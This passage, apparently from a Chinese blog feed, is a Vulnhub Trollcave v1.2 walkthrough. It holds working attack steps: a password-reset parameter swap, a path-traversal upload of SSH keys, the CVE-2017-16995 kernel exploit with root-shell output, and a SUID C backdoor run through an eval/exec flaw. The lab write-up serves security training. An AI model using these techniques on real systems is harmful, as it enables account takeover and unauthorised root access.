class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">King:Superadmin</span><br><span class="line">dave:Admin</span><br><span class="line">dragon:Admin</span><br><span class="line">coderguy:Admin</span><br><span class="line">cooldude89:Moderator</span><br><span class="line">Sir:Moderator</span><br><span class="line">Q:Moderator</span><br><span class="line">teflon:Moderator</span><br><span class="line">TheDankMan:Regular member</span><br><span class="line">artemus:Regular member</span><br><span class="line">MrPotatoHead:Regular member</span><br><span class="line">Ian:Regular member</span><br><span class="line">kev:Member</span><br><span class="line">notanother:Member</span><br><span class="line">anybodyhome:Member</span><br><span class="line">onlyme:Member</span><br><span class="line">xer:Member</span><br></pre></td></tr></table></figure><p>可以到有一个Superadmin用户。</p><p>查询各种资料得到<code>https://github.com/rails/rails</code></p><p>安装的时候会创建用户 rails,网站里还有一个重置密码的功能<code>http://192.168.5.136/password_resets/new</code></p><p>直接选择重置king用户会报错,选择重置xer用户会得到如下链接<code>http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=xer</code></p><p>我们访问这个链接即可重置xer的密码</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231500201.png" alt="image-20230628231500201"></p><p>但我们尝试将<code>http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=xer</code>改为<code>http://192.168.5.136/password_resets/edit.bdmbrG8YFz37cb8GU-2fgA?name=King</code>尝试利用逻辑错误重置king用户的密码</p><p>发现可以直接重置</p><p>进入之后,在file manager上传文件时,发现不能上传,在admin panel中发现可以开启上传</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231519398.png" alt="image-20230628231519398"></p><p>用哥斯拉生成jsp木马,上传至服务器,访问后发现没有解析</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231533945.png" alt="image-20230628231533945"></p><p>那么尝试上传ssh秘钥</p><p>首先生成ssh秘钥</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -f rails</span><br><span class="line">mv rails.pub authorized_keys</span><br></pre></td></tr></table></figure><p>将他上传到<code>/home/rails/.ssh/</code></p><p>上传时要利用<code>../../../../../</code>跳转到根目录,故上传路径为<code>../../../../../../../home/rails/.ssh/authorized_keys</code></p><p>然后进行ssh登录</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mv rails id_rsa-rails chmod 600 id_rsa-rails</span><br><span class="line">ssh -i id_rsa-rails rails@192.168.5.136</span><br></pre></td></tr></table></figure><p>获取权限后查看系统信息</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ uname -a</span><br><span class="line">Linux trollcave 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux</span><br><span class="line">$ cat /etc/lsb-release</span><br><span class="line">DISTRIB_ID=Ubuntu</span><br><span class="line">DISTRIB_RELEASE=16.04</span><br><span class="line">DISTRIB_CODENAME=xenial</span><br><span class="line">DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="CVE-2017-16995提权"><a href="#CVE-2017-16995提权" class="headerlink" title="CVE-2017-16995提权"></a>CVE-2017-16995提权</h4><p>搜索到exp<a href="https://www.exploit-db.com/exploits/45010">https://www.exploit-db.com/exploits/45010</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc cve.c -o cve</span><br></pre></td></tr></table></figure><p>上传至服务器后</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">$ chmod 777 cve</span><br><span class="line">$ ./cve</span><br><span class="line">[.] </span><br><span class="line">[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)</span><br><span class="line">[.] </span><br><span class="line">[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **</span><br><span class="line">[.] </span><br><span class="line">[*] creating bpf map</span><br><span class="line">[*] sneaking evil bpf past the verifier</span><br><span class="line">[*] creating socketpair()</span><br><span class="line">[*] attaching bpf backdoor to socket</span><br><span class="line">[*] skbuff => ffff88002b580900</span><br><span class="line">[*] Leaking sock struct from ffff880028f0e000</span><br><span class="line">[*] Sock->sk_rcvtimeo at offset 472</span><br><span class="line">[*] Cred structure at ffff88002f01b900</span><br><span class="line">[*] UID from cred structure: 1001, matches the current: 1001</span><br><span class="line">[*] hammering cred structure at ffff88002f01b900</span><br><span class="line">[*] credentials patched, launching shell...</span><br><span class="line"># id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),1001(rails)</span><br><span class="line"># cat /root/flag.txt</span><br><span class="line">et tu, dragon?</span><br><span class="line"></span><br><span class="line">c0db34ce8adaa7c07d064cc1697e3d7cb8aec9d5a0c4809d5a0c4809b6be23044d15379c5</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="利用suid提权"><a href="#利用suid提权" class="headerlink" title="利用suid提权"></a>利用suid提权</h4><p>首先切换为bash,然后使用<code>netstat -natpl</code>查看端口</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:~$ netstat -natpl</span><br><span class="line">(Not all processes could be identified, non-owned process info</span><br><span class="line"> will not be shown, you would have to be root to see it all.)</span><br><span class="line">Active Internet connections (servers and established)</span><br><span class="line">Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name</span><br><span class="line">tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 0.0.0.0:3000 0.0.0.0:* LISTEN 1065/ruby2.3 </span><br><span class="line">tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - </span><br><span class="line">tcp 0 0 127.0.0.1:55716 127.0.0.1:80 ESTABLISHED 1450/ruby </span><br><span class="line">tcp 0 0 127.0.0.1:55714 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55744 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55728 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 127.0.0.1:55960 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55720 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 127.0.0.1:55950 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55724 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 192.168.5.136:60830 91.189.91.38:80 ESTABLISHED - </span><br><span class="line">tcp 0 0 127.0.0.1:55958 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 127.0.0.1:55946 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55962 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 192.168.5.136:22 192.168.5.129:45382 ESTABLISHED - </span><br><span class="line">tcp 0 0 127.0.0.1:55968 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55954 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55682 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 192.168.5.136:58824 91.189.91.38:80 CLOSE_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:3000 127.0.0.1:55974 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55738 127.0.0.1:80 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:80 127.0.0.1:55716 ESTABLISHED - </span><br><span class="line">tcp 0 0 127.0.0.1:55964 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp 0 0 127.0.0.1:55970 127.0.0.1:3000 TIME_WAIT - </span><br><span class="line">tcp6 0 0 :::22 :::* LISTEN - </span><br><span class="line">tcp6 0 0 ::1:5432 :::* LISTEN - </span><br><span class="line">tcp6 0 0 ::1:50978 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:51680 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51680 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:51666 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:51678 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:51682 ::1:5432 ESTABLISHED 1065/ruby2.3 </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51682 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51666 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:51678 ESTABLISHED - </span><br><span class="line">tcp6 0 0 ::1:5432 ::1:50978 ESTABLISHED - </span><br></pre></td></tr></table></figure><p>使用<code>Shift + ~ +C</code>切换到ssh,然后使用<code>-L 8888:LOCALHOST:8888</code>将8888端口转发至本地</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231554695.png" alt="image-20230628231554695"></p><p>使用<code> find / -name calc -print 2>&1| grep -v "Permission denied"</code>查找calc</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:~$ find / -name calc -print 2>&1| grep -v "Permission denied"</span><br><span class="line">/usr/src/linux-headers-4.4.0-116-generic/include/config/can/calc</span><br><span class="line">/usr/src/linux-headers-4.4.0-97-generic/include/config/can/calc</span><br><span class="line">/home/king/calc</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>查看calc,发现里面有个calc.js,其中的内容为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:~$ cat /home/king/calc/calc.js </span><br><span class="line">var http = require("http");</span><br><span class="line">var url = require("url");</span><br><span class="line">var sys = require('sys');</span><br><span class="line">var exec = require('child_process').exec;//此处有命令执行漏洞</span><br><span class="line"></span><br><span class="line">// Start server</span><br><span class="line">function start(route)</span><br><span class="line">{</span><br><span class="line"> function onRequest(request, response)</span><br><span class="line"> {</span><br><span class="line"> var theurl = url.parse(request.url);</span><br><span class="line"> var pathname = theurl.pathname;</span><br><span class="line"> var query = theurl.query; </span><br><span class="line"> console.log("Request for " + pathname + query + " received.");</span><br><span class="line"> route(pathname, request, query, response);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">http.createServer(onRequest).listen(8888, '127.0.0.1');</span><br><span class="line">console.log("Server started");</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// Route request</span><br><span class="line">function route(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> console.log("About to route request for " + pathname);</span><br><span class="line"> switch (pathname)</span><br><span class="line"> {</span><br><span class="line"> // security risk</span><br><span class="line"> /*case "/ping":</span><br><span class="line"> pingit(pathname, request, query, response);</span><br><span class="line"> break; */</span><br><span class="line"></span><br><span class="line"> case "/":</span><br><span class="line"> home(pathname, request, query, response);</span><br><span class="line"> break;</span><br><span class="line"></span><br><span class="line"> case "/calc":</span><br><span class="line"> calc(pathname, request, query, response);</span><br><span class="line"> break;</span><br><span class="line"></span><br><span class="line"> default:</span><br><span class="line"> console.log("404");</span><br><span class="line"> display_404(pathname, request, response);</span><br><span class="line"> break;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function home(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> response.end("<h1>The King's Calculator</h1>" +</span><br><span class="line"> "<p>Enter your calculation below:</p>" +</span><br><span class="line"> "<form action='/calc' method='get'>" +</span><br><span class="line"> "<input type='text' name='sum' value='1+1'>" +</span><br><span class="line"> "<input type='submit' value='Calculate!'>" +</span><br><span class="line"> "</form>" +</span><br><span class="line"> "<hr style='margin-top:50%'>" +</span><br><span class="line"> "<small><i>Powered by node.js</i></small>"</span><br><span class="line"> );</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function calc(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> sum = query.split('=')[1];</span><br><span class="line"> console.log(sum)</span><br><span class="line"> response.writeHead(200, {"Content-Type": "text/plain"});</span><br><span class="line"></span><br><span class="line"> response.end(eval(sum).toString());//此处执行了eval</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function ping(pathname, request, query, response)</span><br><span class="line">{</span><br><span class="line"> ip = query.split('=')[1];</span><br><span class="line"> console.log(ip)</span><br><span class="line"> response.writeHead(200, {"Content-Type": "text/plain"});</span><br><span class="line"></span><br><span class="line"> exec("ping -c4 " + ip, function(err, stdout, stderr) {</span><br><span class="line"> response.end(stdout);</span><br><span class="line"> });</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function display_404(pathname, request, response)</span><br><span class="line">{</span><br><span class="line"> response.write("<h1>404 Not Found</h1>");</span><br><span class="line"> response.end("I don't have that page, sorry!");</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// Start the server and route the requests</span><br><span class="line">start(route);</span><br><span class="line">rails@trollcave:~$ </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>经过审计得到var exec = require(‘child_process’).exec;//此处有命令执行漏洞</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231621733.png" alt="image-20230628231621733"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ ls -al</span><br><span class="line">total 56</span><br><span class="line">drwxrwxrwt 9 root root 4096 Sep 2 17:46 .</span><br><span class="line">drwxr-xr-x 23 root root 4096 Sep 2 2021 ..</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .font-unix</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .ICE-unix</span><br><span class="line">-rw-r--r-- 1 king king 0 Sep 2 17:46 passwd</span><br><span class="line">-rw------- 1 rails rails 16664 Sep 2 15:40 RackMultipart20210902-1065-1d715xb</span><br><span class="line">drwx------ 3 root root 4096 Sep 2 2021 systemd-private-3102f8c2d65243ab854375d95f3f6255-systemd-timesyncd.service-yaMXNV</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .Test-unix</span><br><span class="line">drwx------ 2 root root 4096 Sep 2 2021 vmware-root</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .X11-unix</span><br><span class="line">drwxrwxrwt 2 root root 4096 Sep 2 2021 .XIM-unix</span><br><span class="line">rails@trollcave:/tmp$ cat passwd</span><br><span class="line">rails@trollcave:/tmp$ </span><br><span class="line"></span><br></pre></td></tr></table></figure><p>发现是king用户创建的,但是里面没有内容</p><p>在/tmp目录下</p><p>创建一个1.sh,内容为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">touch /tmp/123.txt</span><br></pre></td></tr></table></figure><p>chmod 755 1.sh</p><p>测试是否能够运行</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231643157.png" alt="image-20230628231643157"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ ls</span><br><span class="line">123.txt 1.sh pass passwd RackMultipart20210902-1065-1d715xb systemd-private-3102f8c2d65243ab854375d95f3f6255-systemd-timesyncd.service-yaMXNV vmware-root</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>成功运行了touch命令</p><p>那么可以通过suid进行提权</p><p>查看King的uid和gid</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false</span><br><span class="line">systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false</span><br><span class="line">systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false</span><br><span class="line">systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false</span><br><span class="line">syslog:x:104:108::/home/syslog:/bin/false</span><br><span class="line">_apt:x:105:65534::/nonexistent:/bin/false</span><br><span class="line">lxd:x:106:65534::/var/lib/lxd/:/bin/false</span><br><span class="line">messagebus:x:107:111::/var/run/dbus:/bin/false</span><br><span class="line">uuidd:x:108:112::/run/uuidd:/bin/false</span><br><span class="line">dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false</span><br><span class="line">sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin</span><br><span class="line">postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash</span><br><span class="line">king:x:1000:1000:King,,,:/home/king:/bin/bash</span><br><span class="line">rails:x:1001:1001::/home/rails:</span><br><span class="line">dragon:x:1002:1002:,,,:/home/dragon:/bin/bash</span><br><span class="line">dave:x:1003:1003:,,,:/home/dave:/bin/bash</span><br><span class="line">coderguy:x:1004:1004:,,,:/home/coderguy:/bin/bash</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>King的uid是1000gid是1000</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#include <stdio.h></span><br><span class="line">#include <stdlib.h></span><br><span class="line">#include <unistd.h></span><br><span class="line">int main(int argc,char *argv[])</span><br><span class="line">{</span><br><span class="line">setreuid(1000,1000);</span><br><span class="line">execve("/bin/bash",NULL,NULL);</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>gcc king.c -o king</p><p>然后将king上传至靶机/tmp</p><p>在1.sh中写入</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">cp /tmp/king /home/king/exp</span><br><span class="line">chmod 4755 /home/king/exp</span><br></pre></td></tr></table></figure><p>使用burp运行1.sh</p><p><img src="/2023/10/21/trollcave-v1-2/image-20230628231705251.png" alt="image-20230628231705251"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/tmp$ ls /home/king/</span><br><span class="line">calc exp</span><br></pre></td></tr></table></figure><p>使用exp提权,成功提权到King</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">rails@trollcave:/home/king$ ./exp</span><br><span class="line">king@trollcave:/home/king$ </span><br></pre></td></tr></table></figure><p>查询sudo权限,发现不需要密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">king@trollcave:/home/king$ sudo -l</span><br><span class="line">Matching Defaults entries for king on trollcave:</span><br><span class="line"> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User king may run the following commands on trollcave:</span><br><span class="line"> (ALL) NOPASSWD: ALL</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>那么直接提权到root,获取flag</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">king@trollcave:/home/king$ sudo su -</span><br><span class="line">root@trollcave:~# cat /root/flag.txt </span><br><span class="line">et tu, dragon?</span><br><span class="line"></span><br><span class="line">c0db34ce8adaa7c07d064cc1697e3d7cb8aec9d5a0c4809d5a0c4809b6be23044d15379c5</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><p>cve-2017-16995在虚拟机安装有故障的时候会提权失败。suid提权是需要对应权限的用户的命令。chmod 4755与chmod 755 的区别在于开头多了一位,这个4表示其他用户执行文件时,具有与所有者相当的权限。</p>]]></content>
<categories>
<category> Vulnhub </category>
</categories>
<tags>
<tag> 渗透测试 </tag>
<tag> 提权 </tag>
<tag> Linux </tag>
</tags>
</entry>
</search>